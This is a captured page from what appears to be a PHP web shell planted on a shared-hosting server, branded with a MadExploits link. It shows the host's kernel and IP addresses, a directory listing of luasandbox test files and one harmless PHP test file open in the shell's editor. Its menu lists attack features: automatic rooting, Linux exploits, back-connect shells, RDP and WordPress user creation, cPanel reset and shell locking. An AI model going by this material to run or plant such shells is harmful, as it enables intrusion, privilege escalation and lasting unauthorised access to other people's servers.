Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 52.15.35.108
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
tests /
alt-php82-pecl-luasandbox_4.1.2-2.el8 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
LuaSandboxFunction_construct.p...
253
B
-rw-r--r--
array-key-conversion.phpt
3.11
KB
-rw-r--r--
call.phpt
5.1
KB
-rw-r--r--
callback_exception.phpt
392
B
-rw-r--r--
datatypes-unsupported.phpt
2.78
KB
-rw-r--r--
datatypes.phpt
2.43
KB
-rw-r--r--
dump_loadBinary_call.phpt
393
B
-rw-r--r--
errors-at-call-boundaries.phpt
1.98
KB
-rw-r--r--
extending-LuaSandbox.phpt
845
B
-rw-r--r--
ipairs.phpt
1.53
KB
-rw-r--r--
loadString.phpt
334
B
-rw-r--r--
lua_catches_php_exception.phpt
1.34
KB
-rw-r--r--
pairs.phpt
3.31
KB
-rw-r--r--
pcall.phpt
1.27
KB
-rw-r--r--
profiler-sorting.phpt
1.18
KB
-rw-r--r--
profiler.phpt
1.54
KB
-rw-r--r--
reentrant.phpt
1.1
KB
-rw-r--r--
xpcall.phpt
2.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : extending-LuaSandbox.phpt
--TEST-- Extending LuaSandbox --FILE-- <?php // bugs T59292 and T205370 #[AllowDynamicProperties] class ExtendedLuaSandbox extends LuaSandbox { public $var1; public $var2; public $var3; public $var4; public $var5; } $sandbox = new ExtendedLuaSandbox; for($i=1; $i<=5; $i++){ $sandbox->{"var$i"} = $i; } var_dump( $sandbox ); for($i=6; $i<=10; $i++){ $sandbox->{"var$i"} = $i; } var_dump( $sandbox ); echo "ok\n"; --EXPECT-- object(ExtendedLuaSandbox)#1 (5) { ["var1"]=> int(1) ["var2"]=> int(2) ["var3"]=> int(3) ["var4"]=> int(4) ["var5"]=> int(5) } object(ExtendedLuaSandbox)#1 (10) { ["var1"]=> int(1) ["var2"]=> int(2) ["var3"]=> int(3) ["var4"]=> int(4) ["var5"]=> int(5) ["var6"]=> int(6) ["var7"]=> int(7) ["var8"]=> int(8) ["var9"]=> int(9) ["var10"]=> int(10) } ok
Close